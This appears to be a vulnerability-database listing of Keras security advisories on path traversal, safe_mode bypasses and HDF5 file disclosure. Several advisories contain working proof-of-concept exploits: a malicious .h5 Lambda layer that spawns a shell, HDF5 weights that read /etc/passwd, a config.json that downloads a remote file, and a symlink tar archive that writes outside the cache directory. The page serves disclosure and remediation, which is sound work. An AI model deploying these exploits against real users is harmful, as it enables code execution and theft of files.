Python/keras/3.7.0
Multi-backend Keras
https://pypi.org/project/keras
Apache-2.0
14 Security Vulnerabilities
Duplicate Advisory: Keras keras.utils.get_file API is vulnerable to a path traversal attack
- https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9
- https://nvd.nist.gov/vuln/detail/CVE-2025-12060
- https://github.com/keras-team/keras/pull/21760
- https://github.com/keras-team/keras/commit/47fcb397ee4caffd5a75efd1fa3067559594e951
- https://github.com/advisories/GHSA-28jp-44vh-q42h
- https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-hjqc-jx6g-rwp9. This link is maintained to preserve external references.
Original Description
The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python's tarfile.extractall function without the filter=data
feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517. Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).
Keras is vulnerable to Deserialization of Untrusted Data
- https://nvd.nist.gov/vuln/detail/CVE-2025-9906
- https://github.com/keras-team/keras/pull/21429
- https://github.com/keras-team/keras/commit/713172ab56b864e59e2aa79b1a51b0e728bba858
- https://github.com/keras-team/keras/releases/tag/v3.11.0
- https://osv.dev/vulnerability/CVE-2025-9906
- https://github.com/advisories/GHSA-36fq-jgmw-4r9c
Arbitrary Code Execution in Keras
Keras versions prior to 3.11.0 allow for arbitrary code execution when loading a crafted .keras model archive, even when safe_mode=True.
The issue arises because the archive’s config.json is parsed before layer deserialization. This can invoke keras.config.enable_unsafe_deserialization(), effectively disabling safe mode from within the loading process itself. An attacker can place this call first in the archive and then include a Lambda layer whose function is deserialized from a pickle, leading to the execution of attacker-controlled Python code as soon as a victim loads the model file.
Exploitation requires a user to open an untrusted model; no additional privileges are needed. The fix in version 3.11.0 enforces safe-mode semantics before reading any user-controlled configuration and prevents the toggling of unsafe deserialization via the config file.
Affected versions: < 3.11.0 Patched version: 3.11.0
It is recommended to upgrade to version 3.11.0 or later and to avoid opening untrusted model files.
The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.
Note: This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your SECURITY.md, but received no response.
Summary
When a model in the .h5 (or .hdf5) format is loaded using the Keras Model.load_model method, the safe_mode=True setting is silently ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the .h5/.hdf5 file format. The attack works regardless of the other parameters passed to load_model and does not require any sophisticated technique—.h5 and .hdf5 files are simply not checked for unsafe code execution.
From this point on, I will refer only to the .h5 file format, though everything equally applies to .hdf5.
Details
Intended behaviour
According to the official Keras documentation, safe_mode is defined as:
safe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True.
I understand that the behavior described in this report is somehow intentional, as safe_mode is only applicable to .keras models.
However, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. .h5 files can still be loaded seamlessly using load_model with safe_mode=True, and the absence of any warning or error creates a false sense of security. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if safe_mode cannot be applied to a given file format, an explicit error should be raised to alert the user.
This issue is particularly critical given the widespread use of the .h5 format, despite the introduction of newer formats.
As a small anecdotal test, I asked several of my colleagues what they would expect when loading a .h5 file with safe_mode=True. None of them expected the setting to be silently ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers—experts in binary or ML security—and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.
Technical Details
Examining the implementation of load_model in keras/src/saving/saving_api.py, we can see that the safe_mode parameter is completely ignored when loading .h5 files. Here's the relevant snippet:
def load_model(filepath, custom_objects=None, compile=True, safe_mode=True):
is_keras_zip = ...
is_keras_dir = ...
is_hf = ...
# Support for remote zip files
if (
file_utils.is_remote_path(filepath)
and not file_utils.isdir(filepath)
and not is_keras_zip
and not is_hf
):
...
if is_keras_zip or is_keras_dir or is_hf:
...
if str(filepath).endswith((".h5", ".hdf5")):
return legacy_h5_format.load_model_from_hdf5(
filepath, custom_objects=custom_objects, compile=compile
)
As shown, when the file format is .h5 or .hdf5, the method delegates to legacy_h5_format.load_model_from_hdf5, which does not use or check the safe_mode parameter at all.
Solution
Since the release of the new .keras format, I believe the simplest and most effective way to address this misleading behavior—and to improve security in Keras—is to have the safe_mode parameter raise an explicit error when safe_mode=True is used with .h5/.hdf5 files. This error should be clear and informative, explaining that the legacy format does not support safe_mode and outlining the associated risks of loading such files.
I recognize this fix may have minor backward compatibility considerations.
If you confirm that you're open to this approach, I’d be happy to open a PR that includes the missing check.
PoC
From the attacker’s perspective, creating a malicious .h5 model is as simple as the following:
import keras
f = lambda x: (
exec("import os; os.system('sh')"),
x,
)
model = keras.Sequential()
model.add(keras.layers.Input(shape=(1,)))
model.add(keras.layers.Lambda(f))
model.compile()
keras.saving.save_model(model, "./provola.h5")
From the victim’s side, triggering code execution is just as simple:
import keras
model = keras.models.load_model("./provola.h5", safe_mode=True)
That’s all. The exploit occurs during model loading, with no further interaction required. The parameters passed to the method do not mitigate of influence the attack in any way.
As expected, the attacker can substitute the exec(...) call with any payload. Whatever command is used will execute with the same permissions as the Keras application.
Attack scenario
The attacker may distribute a malicious .h5/.hdf5 model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model—even with safe_mode=True that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.
Once the model is loaded, the attacker gains the ability to execute arbitrary code on the victim’s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.
Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading
- https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q
- https://nvd.nist.gov/vuln/detail/CVE-2026-1669
- https://github.com/keras-team/keras/pull/22057
- https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553
- https://github.com/keras-team/keras/releases/tag/v3.12.1
- https://github.com/keras-team/keras/releases/tag/v3.13.2
- https://github.com/advisories/GHSA-3m4q-jmj6-r34q
Summary
TensorFlow / Keras continues to honor HDF5 “external storage” and ExternalLink features when loading weights. A malicious .weights.h5 (or a .keras archive embedding such weights) can direct load_weights() to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (tensorflow 2.20.0, keras 3.11.3, h5py 3.15.1, numpy 2.3.4).
Impact
- Class: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)
- What leaks: Contents of any readable file on the host (e.g.,
/etc/hosts,/etc/passwd,/etc/hostname). - Visibility: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.
- Prerequisites: Victim executes
model.load_weights()ortf.keras.models.load_model()on an attacker-supplied HDF5 weights file or.kerasarchive. - Scope: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.
Attacker Scenario
- Initial foothold: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.
- Crafted payload: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g.,
/home/<user>/.ssh/id_rsa,/etc/shadowif readable, configuration files containing API keys, etc.). - Execution: The victim calls
model.load_weights()(ortf.keras.models.load_model()for.kerasarchives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors. - Exfiltration vectors:
- Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.
- Re-saving the model (weights or
.kerasarchive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry. - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.
Additional Preconditions
- The target file must exist and be readable by the process running TensorFlow/Keras.
- Safe mode (
load_model(..., safe_mode=True)) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization. - Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to
/etc/hostname) can reduce impact, but common defaults expose a broad set of host files.
Environment Used for Verification (2025‑10‑19)
- OS: Debian-based container running Python 3.11.
- Packages (installed via
python -m pip install -U ...):tensorflow==2.20.0keras==3.11.3h5py==3.15.1numpy==2.3.4
- Tooling:
strace(for syscall tracing),pipupgraded to latest before installs. - Debug flags:
PYTHONFAULTHANDLER=1,TF_CPP_MIN_LOG_LEVEL=0during instrumentation to capture verbose logs if needed.
Reproduction Instructions (Weights-Only PoC)
- Ensure the environment above (or equivalent) is prepared.
- Save the following script as
weights_external_demo.py:
from __future__ import annotations
import os
from pathlib import Path
import numpy as np
import tensorflow as tf
import h5py
def choose_host_file() -> Path:
candidates = [
os.environ.get("KFLI_PATH"),
"/etc/machine-id",
"/etc/hostname",
"/proc/sys/kernel/hostname",
"/etc/passwd",
]
for candidate in candidates:
if not candidate:
continue
path = Path(candidate)
if path.exists() and path.is_file():
return path
raise FileNotFoundError("set KFLI_PATH to a readable file")
def build_model(units: int) -> tf.keras.Model:
model = tf.keras.Sequential([
tf.keras.layers.Input(shape=(1,), name="input"),
tf.keras.layers.Dense(units, activation=None, use_bias=True, name="dense"),
])
model(tf.zeros((1, 1))) # build weights
return model
def find_bias_dataset(h5file: h5py.File) -> str:
matches: list[str] = []
def visit(name: str, obj) -> None:
if isinstance(obj, h5py.Dataset) and name.endswith("bias:0"):
matches.append(name)
h5file.visititems(visit)
if not matches:
raise RuntimeError("bias dataset not found")
return matches[0]
def rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]:
with h5py.File(path, "r+") as h5file:
bias_path = find_bias_dataset(h5file)
parent = h5file[str(Path(bias_path).parent)]
dset_name = Path(bias_path).name
del parent[dset_name]
max_bytes = 128
size = host_file.stat().st_size
nbytes = min(size, max_bytes)
nbytes = (nbytes // 4) * 4 or 32 # multiple of 4 for float32 packing
units = max(1, nbytes // 4)
parent.create_dataset(
dset_name,
shape=(units,),
dtype="float32",
external=[(host_file.as_posix(), 0, nbytes)],
)
return units, nbytes
def floats_to_ascii(arr: np.ndarray) -> tuple[str, str]:
raw = np.ascontiguousarray(arr).view(np.uint8)
ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode("ascii", "ignore")
hex_preview = raw[:64].tobytes().hex()
return ascii_preview, hex_preview
def main() -> None:
host_file = choose_host_file()
model = build_model(units=32)
weights_path = Path("weights_demo.h5")
model.save_weights(weights_path.as_posix())
units, nbytes = rewrite_bias_external(weights_path, host_file)
print("secret_text_source", host_file)
print("units", units, "bytes_mapped", nbytes)
model.load_weights(weights_path.as_posix())
output = model.predict(tf.zeros((1, 1)), verbose=0)[0]
ascii_preview, hex_preview = floats_to_ascii(output)
print("recovered_ascii", ascii_preview)
print("recovered_hex64", hex_preview)
saved = Path("weights_demo_resaved.h5")
model.save_weights(saved.as_posix())
print("resaved_weights", saved.as_posix())
if __name__ == "__main__":
main()
- Execute
python weights_external_demo.py. - Observe:
secret_text_sourceprints the chosen host file path.recovered_ascii/recovered_hex64display the file contents recovered via model inference.- A re-saved weights file contains the leaked bytes inside the artifact.
Expanded Validation (Multiple Attack Scenarios)
The following test harness generalises the attack for multiple HDF5 constructs:
- Build a minimal feed-forward model and baseline weights.
- Create three malicious variants:
- External storage dataset: dataset references
/etc/hosts. - External link:
ExternalLinkpointing at/etc/passwd. - Indirect link: external storage referencing a helper HDF5 that, in turn, refers to
/etc/hostname.
- External storage dataset: dataset references
- Run each scenario under
strace -f -e trace=open,openat,readwhile callingmodel.load_weights(...). - Post-process traces and weight tensors to show the exact bytes loaded.
Relevant syscall excerpts captured during the run:
openat(AT_FDCWD, "/etc/hosts", O_RDONLY|O_CLOEXEC) = 7
read(7, "127.0.0.1 localhost\n", 64) = 21
...
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 9
read(9, "root:x:0:0:root:/root:/bin/bash\n", 64) = 32
...
openat(AT_FDCWD, "/etc/hostname", O_RDONLY|O_CLOEXEC) = 8
read(8, "example-host\n", 64) = 13
The corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.
Recommended Product Fix
- Default-deny external datasets/links:
- Inspect creation property lists (
get_external_count) before materialising tensors. - Resolve
SoftLink/ExternalLinktargets and block if they leave the HDF5 file.
- Inspect creation property lists (
- Provide an escape hatch:
- Offer an explicit
allow_external_data=Trueflag or environment variable for advanced users who truly rely on HDF5 external storage.
- Offer an explicit
- Documentation:
- Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.
- Regression coverage:
- Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.
Workarounds
- Avoid loading untrusted HDF5 weight files.
- Pre-scan weight files using
h5pyto detect external datasets or links before invoking Keras loaders. - Prefer alternate formats (e.g., NumPy
.npz) that lack external reference capabilities when exchanging weights. - If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.
Timeline (UTC)
- 2025‑10‑18: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.
- 2025‑10‑19: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented
safe_keras_hdf5.pyprototype guard.
Arbitrary Code Execution via Crafted Keras Config for Model Loading
- https://github.com/keras-team/keras/security/advisories/GHSA-48g7-3x6r-xfhp
- https://nvd.nist.gov/vuln/detail/CVE-2025-1550
- https://github.com/keras-team/keras/pull/20751
- https://github.com/keras-team/keras/commit/e67ac8ffd0c883bec68eb65bb52340c7f9d3a903
- https://github.com/keras-team/keras/releases/tag/v3.9.0
- https://github.com/advisories/GHSA-48g7-3x6r-xfhp
Impact
The Keras Model.load_model function permits arbitrary code execution, even with safe_mode=True, through a manually constructed, malicious .keras archive. By altering the config.json file within the archive, an attacker can specify arbitrary Python modules and functions, along with their arguments, to be loaded and executed during model loading.
Patches
This problem is fixed starting with version 3.9.
Workarounds
Only load models from trusted sources and model archives created with Keras.
References
Duplicate Advisory: Keras arbitrary code execution vulnerability
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-48g7-3x6r-xfhp. This link is maintained to preserve external references.
Original Description
The Keras Model.loadmodel function permits arbitrary code execution, even with safemode=True, through a manually constructed, malicious .keras archive. By altering the config.json file within the archive, an attacker can specify arbitrary Python modules and functions, along with their arguments, to be loaded and executed during model loading.
Duplicate Advisory: The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-36rr-ww3j-vrjv. This link is maintained to preserve external references.
Original Description
The Keras Model.loadmodel method can be exploited to achieve arbitrary code execution, even with safemode=True.
One can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.
This is achieved by crafting a special .h5 archive file that uses the Lambda layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True option is not honored when reading .h5 archives.
Note that the .h5/.hdf5 format is a legacy format supported by Keras 3 for backwards compatibility.
Keras vulnerable to CVE-2025-1550 bypass via reuse of internal functionality
- https://github.com/keras-team/keras/security/advisories/GHSA-c9rc-mg46-23w3
- https://nvd.nist.gov/vuln/detail/CVE-2025-8747
- https://github.com/keras-team/keras/pull/21429
- https://github.com/keras-team/keras/commit/713172ab56b864e59e2aa79b1a51b0e728bba858
- https://jfrog.com/blog/keras-safe_mode-bypass-vulnerability
- https://github.com/advisories/GHSA-c9rc-mg46-23w3
Summary
It is possible to bypass the mitigation introduced in response to CVE-2025-1550, when an untrusted Keras v3 model is loaded, even when “safe_mode” is enabled, by crafting malicious arguments to built-in Keras modules.
The vulnerability is exploitable on the default configuration and does not depend on user input (just requires an untrusted model to be loaded).
Impact
| Type | Vector | Impact |
|---|---|---|
| Unsafe deserialization | Client-Side (when loading untrusted model) | Arbitrary file overwrite. Can lead to Arbitrary code execution in many cases. |
Details
Keras’ safe_mode flag is designed to disallow unsafe lambda deserialization - specifically by rejecting any arbitrary embedded Python code, marked by the “lambda” class name. https://github.com/keras-team/keras/blob/v3.8.0/keras/src/saving/serialization_lib.py#L641 -
if config["class_name"] == "__lambda__":
if safe_mode:
raise ValueError(
"Requested the deserialization of a `lambda` object. "
"This carries a potential risk of arbitrary code execution "
"and thus it is disallowed by default. If you trust the "
"source of the saved model, you can pass `safe_mode=False` to "
"the loading function in order to allow `lambda` loading, "
"or call `keras.config.enable_unsafe_deserialization()`."
)
A fix to the vulnerability, allowing deserialization of the object only from internal Keras modules, was introduced in the commit bb340d6780fdd6e115f2f4f78d8dbe374971c930.
package = module.split(".", maxsplit=1)[0]
if package in {"keras", "keras_hub", "keras_cv", "keras_nlp"}:
However, it is still possible to exploit model loading, for example by reusing the internal Keras function keras.utils.get_file, and download remote files to an attacker-controlled location. This allows for arbitrary file overwrite which in many cases could also lead to remote code execution. For example, an attacker would be able to download a malicious authorized_keys file into the user’s SSH folder, giving the attacker full SSH access to the victim’s machine. Since the model does not contain arbitrary Python code, this scenario will not be blocked by “safe_mode”. It will bypass the latest fix since it uses a function from one of the approved modules (keras).
Example
The following truncated config.json will cause a remote file download from https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js to the local /tmp folder, by sending arbitrary arguments to Keras’ builtin function keras.utils.get_file() -
{
"class_name": "Lambda",
"config": {
"arguments": {
"origin": "https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js",
"cache_dir":"/tmp",
"cache_subdir":"",
"force_download": true},
"function": {
"class_name": "function",
"config": "get_file",
"module": "keras.utils"
}
},
PoC
Download maliciousmodeldownload.keras to a local directory
Load the model -
from keras.models import load_model
model = load_model("malicious_model_download.keras", safe_mode=True)
- Observe that a new file
index.jswas created in the/tmpdirectory
Fix suggestions
- Add an additional flag
block_all_lambdathat allows users to completely disallow loading models with a Lambda layer. - Audit the
keras,keras_hub,keras_cv,keras_nlpmodules and remove/block all “gadget functions” which could be used by malicious ML models. - Add an additional flag
lambda_whitelist_functionsthat allows users to specify a list of functions that are allowed to be invoked by a Lambda layer
Credit
The vulnerability was discovered by Andrey Polkovnichenko of the JFrog Vulnerability Research
keras Path Traversal vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2024-55459
- https://github.com/keras-team/keras
- https://keras.io
- https://river-bicycle-f1e.notion.site/Arbitrary-File-Write-Vulnerability-in-get_file-function-11888e31952580179224e50892976d32
- https://github.com/keras-team/keras/blob/8f5592bcb61ff48c96560c8923e482db1076b54a/keras/src/utils/file_utils.py#L115
- https://github.com/advisories/GHSA-cjgq-5qmw-rcj6
An issue in keras 3.7.0 allows attackers to write arbitrary files to the user's machine via downloading a crafted tar file through the get_file function.
Duplicate Advisory: Keras vulnerable to arbitrary file read in the model loading mechanism (HDF5 integration)
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-3m4q-jmj6-r34q. This link is maintained to preserve external references.
Original Description
Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.
Keras Directory Traversal Vulnerability
- https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9
- https://nvd.nist.gov/vuln/detail/CVE-2025-12060
- https://nvd.nist.gov/vuln/detail/CVE-2025-12638
- https://github.com/keras-team/keras/pull/21760
- https://github.com/keras-team/keras/commit/47fcb397ee4caffd5a75efd1fa3067559594e951
- https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4
- https://github.com/advisories/GHSA-hjqc-jx6g-rwp9
Summary
Keras's keras.utils.get_file() function is vulnerable to directory traversal attacks despite implementing filter_safe_paths(). The vulnerability exists because extract_archive() uses Python's tarfile.extractall() method without the security-critical filter="data" parameter. A PATH_MAX symlink resolution bug occurs before path filtering, allowing malicious tar archives to bypass security checks and write files outside the intended extraction directory.
Details
Root Cause Analysis
Current Keras Implementation ```python
From keras/src/utils/file_utils.py#L121
if zipfile.iszipfile(filepath): # Zip archive. archive.extractall(path) else: # Tar archive, perhaps unsafe. Filter paths. archive.extractall(path, members=filtersafepaths(archive)) ```
The Critical Flaw
While Keras attempts to filter unsafe paths using filter_safe_paths(), this filtering happens after the tar archive members are parsed and before actual extraction. However, the PATH_MAX symlink resolution bug occurs during extraction, not during member enumeration.
Exploitation Flow: 1. Archive parsing: filter_safe_paths() sees symlink paths that appear safe 2. Extraction begins: extractall() processes the filtered members 3. PATH_MAX bug triggers: Symlink resolution fails due to path length limits 4. Security bypass: Failed resolution causes literal path interpretation 5. Directory traversal: Files written outside intended directory
Technical Details
The vulnerability exploits a known issue in Python's tarfile module where excessively long symlink paths can cause resolution failures, leading to the symlink being treated as a literal path. This bypasses Keras's path filtering because:
filter_safe_paths()operates on the parsed tar member information- The PATH_MAX bug occurs during actual file system operations in
extractall() - Failed symlink resolution falls back to literal path interpretation
- This allows traversal paths like
../../../../etc/passwdto be written
Affected Code Location
File: keras/src/utils/file_utils.py
Function: extract_archive() around line 121
Issue: Missing filter="data" parameter in tarfile.extractall()
Proof of Concept
#!/usr/bin/env python3
import os, io, sys, tarfile, pathlib, platform, threading, time
import http.server, socketserver
# Import Keras directly (not through TensorFlow)
try:
import keras
print("Using standalone Keras:", keras.__version__)
get_file = keras.utils.get_file
except ImportError:
try:
import tensorflow as tf
print("Using Keras via TensorFlow:", tf.keras.__version__)
get_file = tf.keras.utils.get_file
except ImportError:
print("Neither Keras nor TensorFlow found!")
sys.exit(1)
print("=" * 60)
print("Keras get_file() PATH_MAX Symlink Vulnerability PoC")
print("=" * 60)
print("Python:", sys.version.split()[0])
print("Platform:", platform.platform())
root = pathlib.Path.cwd()
print(f"Working directory: {root}")
# Create target directory for exploit demonstration
exploit_dir = root / "exploit"
exploit_dir.mkdir(exist_ok=True)
# Clean up any previous exploit files
try:
(exploit_dir / "keras_pwned.txt").unlink()
except FileNotFoundError:
pass
print(f"\n=== INITIAL STATE ===")
print(f"Exploit directory: {exploit_dir}")
print(f"Files in exploit/: {[f.name for f in exploit_dir.iterdir()]}")
# Create malicious tar with PATH_MAX symlink resolution bug
print(f"\n=== Building PATH_MAX Symlink Exploit ===")
# Parameters for PATH_MAX exploitation
comp = 'd' * (55 if sys.platform == 'darwin' else 247)
steps = "abcdefghijklmnop" # 16-step symlink chain
path = ""
with tarfile.open("keras_dataset.tgz", mode="w:gz") as tar:
print("Creating deep symlink chain...")
# Build the symlink chain that will exceed PATH_MAX during resolution
for i, step in enumerate(steps):
# Directory with long name
dir_info = tarfile.TarInfo(os.path.join(path, comp))
dir_info.type = tarfile.DIRTYPE
tar.addfile(dir_info)
# Symlink pointing to that directory
link_info = tarfile.TarInfo(os.path.join(path, step))
link_info.type = tarfile.SYMTYPE
link_info.linkname = comp
tar.addfile(link_info)
path = os.path.join(path, comp)
if i < 3 or i % 4 == 0: # Print progress for first few and every 4th
print(f" Step {i+1}: {step} -> {comp[:20]}...")
# Create the final symlink that exceeds PATH_MAX
# This is where the symlink resolution breaks down
long_name = "x" * 254
linkpath = os.path.join("/".join(steps), long_name)
max_link = tarfile.TarInfo(linkpath)
max_link.type = tarfile.SYMTYPE
max_link.linkname = ("../" * len(steps))
tar.addfile(max_link)
print(f"✓ Created PATH_MAX symlink: {len(linkpath)} characters")
print(f" Points to: {'../' * len(steps)}")
# Exploit file through the broken symlink resolution
exploit_path = linkpath + "/../../../exploit/keras_pwned.txt"
exploit_content = b"KERAS VULNERABILITY CONFIRMED!\nThis file was created outside the cache directory!\nKeras get_file() is vulnerable to PATH_MAX symlink attacks!\n"
exploit_file = tarfile.TarInfo(exploit_path)
exploit_file.type = tarfile.REGTYPE
exploit_file.size = len(exploit_content)
tar.addfile(exploit_file, fileobj=io.BytesIO(exploit_content))
print(f"✓ Added exploit file via broken symlink path")
# Add legitimate dataset content
dataset_content = b"# Keras Dataset Sample\nThis appears to be a legitimate ML dataset\nimage1.jpg,cat\nimage2.jpg,dog\nimage3.jpg,bird\n"
dataset_file = tarfile.TarInfo("dataset/labels.csv")
dataset_file.type = tarfile.REGTYPE
dataset_file.size = len(dataset_content)
tar.addfile(dataset_file, fileobj=io.BytesIO(dataset_content))
# Dataset directory
dataset_dir = tarfile.TarInfo("dataset/")
dataset_dir.type = tarfile.DIRTYPE
tar.addfile(dataset_dir)
print("✓ Malicious Keras dataset created")
# Comparison Test: Python tarfile with filter (SAFE)
print(f"\n=== COMPARISON: Python tarfile with data filter ===")
try:
with tarfile.open("keras_dataset.tgz", "r:gz") as tar:
tar.extractall("python_safe", filter="data")
files_after = [f.name for f in exploit_dir.iterdir()]
print(f"✓ Python safe extraction completed")
print(f"Files in exploit/: {files_after}")
# Cleanup
import shutil
if pathlib.Path("python_safe").exists():
shutil.rmtree("python_safe", ignore_errors=True)
except Exception as e:
print(f"❌ Python safe extraction blocked: {str(e)[:80]}...")
files_after = [f.name for f in exploit_dir.iterdir()]
print(f"Files in exploit/: {files_after}")
# Start HTTP server to serve malicious archive
class SilentServer(http.server.SimpleHTTPRequestHandler):
def log_message(self, *args): pass
def run_server():
with socketserver.TCPServer(("127.0.0.1", 8005), SilentServer) as httpd:
httpd.allow_reuse_address = True
httpd.serve_forever()
server = threading.Thread(target=run_server, daemon=True)
server.start()
time.sleep(0.3)
# Keras vulnerability test
cache_dir = root / "keras_cache"
cache_dir.mkdir(exist_ok=True)
url = "http://127.0.0.1:8005/keras_dataset.tgz"
print(f"\n=== KERAS VULNERABILITY TEST ===")
print(f"Testing: keras.utils.get_file() with extract=True")
print(f"URL: {url}")
print(f"Cache: {cache_dir}")
print(f"Expected extraction: keras_cache/datasets/keras_dataset/")
print(f"Exploit target: exploit/keras_pwned.txt")
try:
# The vulnerable Keras call
extracted_path = get_file(
"keras_dataset",
url,
cache_dir=str(cache_dir),
extract=True
)
print(f"✓ Keras extraction completed")
print(f"✓ Returned path: {extracted_path}")
except Exception as e:
print(f"❌ Keras extraction failed: {e}")
import traceback
traceback.print_exc()
# Vulnerability assessment
print(f"\n=== VULNERABILITY RESULTS ===")
final_exploit_files = [f.name for f in exploit_dir.iterdir()]
print(f"Files in exploit directory: {final_exploit_files}")
if "keras_pwned.txt" in final_exploit_files:
print(f"\n🚨 KERAS VULNERABILITY CONFIRMED! 🚨")
exploit_file = exploit_dir / "keras_pwned.txt"
content = exploit_file.read_text()
print(f"Exploit file created: {exploit_file}")
print(f"Content:\n{content}")
print(f"🔍 TECHNICAL DETAILS:")
print(f" • Keras uses tarfile.extractall() without filter parameter")
print(f" • PATH_MAX symlink resolution bug bypassed security checks")
print(f" • File created outside intended cache directory")
print(f" • Same vulnerability pattern as TensorFlow get_file()")
print(f"\n📊 COMPARISON RESULTS:")
print(f" ✅ Python with filter='data': BLOCKED exploit")
print(f" ⚠️ Keras get_file(): ALLOWED exploit")
else:
print(f"✅ No exploit files detected")
print(f"Possible reasons:")
print(f" • Keras version includes security patches")
print(f" • Platform-specific path handling prevented exploit")
print(f" • Archive extraction path differed from expected")
# Show what Keras actually extracted (safely)
print(f"\n=== KERAS EXTRACTION ANALYSIS ===")
try:
if 'extracted_path' in locals() and pathlib.Path(extracted_path).exists():
keras_path = pathlib.Path(extracted_path)
print(f"Keras extracted to: {keras_path}")
# Safely list contents
try:
contents = [item.name for item in keras_path.iterdir()]
print(f"Top-level contents: {contents}")
# Count symlinks (indicates our exploit structure was created)
symlink_count = 0
for item in keras_path.iterdir():
try:
if item.is_symlink():
symlink_count += 1
except PermissionError:
continue
print(f"Symlinks created: {symlink_count}")
if symlink_count > 0:
print(f"✓ PATH_MAX symlink chain was extracted")
except PermissionError:
print(f"Permission errors in extraction directory (expected with symlink corruption)")
except Exception as e:
print(f"Could not analyze Keras extraction: {e}")
print(f"\n=== REMEDIATION ===")
print(f"To fix this vulnerability, Keras should use:")
print(f"```python")
print(f"tarfile.extractall(path, filter='data') # Safe")
print(f"```")
print(f"Instead of:")
print(f"```python")
print(f"tarfile.extractall(path) # Vulnerable")
print(f"```")
# Cleanup
print(f"\n=== CLEANUP ===")
try:
os.unlink("keras_dataset.tgz")
print(f"✓ Removed malicious tar file")
except:
pass
print("PoC completed!")
Environment Setup
- Python: 3.8+ (tested on multiple versions)
- Keras: Standalone Keras or TensorFlow.Keras
- Platform: Linux, macOS, Windows (path handling varies)
Exploitation Steps
- Create malicious tar archive with PATH_MAX symlink chain
- Host archive on accessible HTTP server
- Call
keras.utils.get_file()withextract=True - Observe directory traversal - files written outside cache directory
Key Exploit Components
- Deep symlink chain: 16+ nested symlinks with long directory names
- PATH_MAX overflow: Final symlink path exceeding system limits
- Traversal payload: Relative path traversal (
../../../target/file) - Legitimate disguise: Archive contains valid-looking dataset files
Demonstration Results
Vulnerable behavior: - Files extracted outside intended cache_dir/datasets/ location - Security filtering bypassed completely - No error or warning messages generated
Expected secure behavior: - Extraction blocked or confined to cache directory - Security warnings for suspicious archive contents
